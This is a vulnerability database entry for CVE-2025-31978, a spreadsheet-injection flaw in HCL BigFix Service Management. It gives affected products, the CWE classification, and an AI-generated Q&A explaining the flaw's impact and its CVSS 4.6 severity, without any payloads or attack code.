CVE-2025-31978
HCL BigFix Service Management Spreadsheet File Processing Flaw
Publication date: 2026-05-06
Last updated on: 2026-05-06
Assigner: HCL Software
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| hcl | bigfix_service_management | * |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-201 | The code transmits data to another actor, but a portion of the data includes sensitive information that should not be accessible to that actor. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
HCL BigFix Service Management (SM) does not properly sanitize or safely render spreadsheet files such as CSV, XLS, and XLSX before processing or distributing them.
An attacker can insert malicious data into these spreadsheet files that, when saved as CSV and opened in spreadsheet software, may execute actions like information exfiltration or other harmful activities.
Although current versions of Excel provide warnings about untrusted content, the vulnerability arises from the unsafe handling of these files by the BigFix SM system.
How can this vulnerability impact me? :
This vulnerability can lead to partial compromise of confidentiality and integrity of data.
- An attacker could exfiltrate sensitive information through malicious spreadsheet content.
- Malicious actions could be automatically executed when the spreadsheet is opened, potentially leading to further exploitation.
The CVSS score of 4.6 indicates a medium severity impact, requiring user interaction and low privileges but with network attack vector.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability in HCL BigFix Service Management involves inadequate sanitization and unsafe rendering of spreadsheet files, which could lead to information exfiltration or other malicious activities. Such risks may impact compliance with data protection standards and regulations like GDPR and HIPAA, which require safeguarding sensitive information against unauthorized access or leakage.
However, the provided information does not explicitly describe the direct effects of this vulnerability on compliance with these standards or regulations.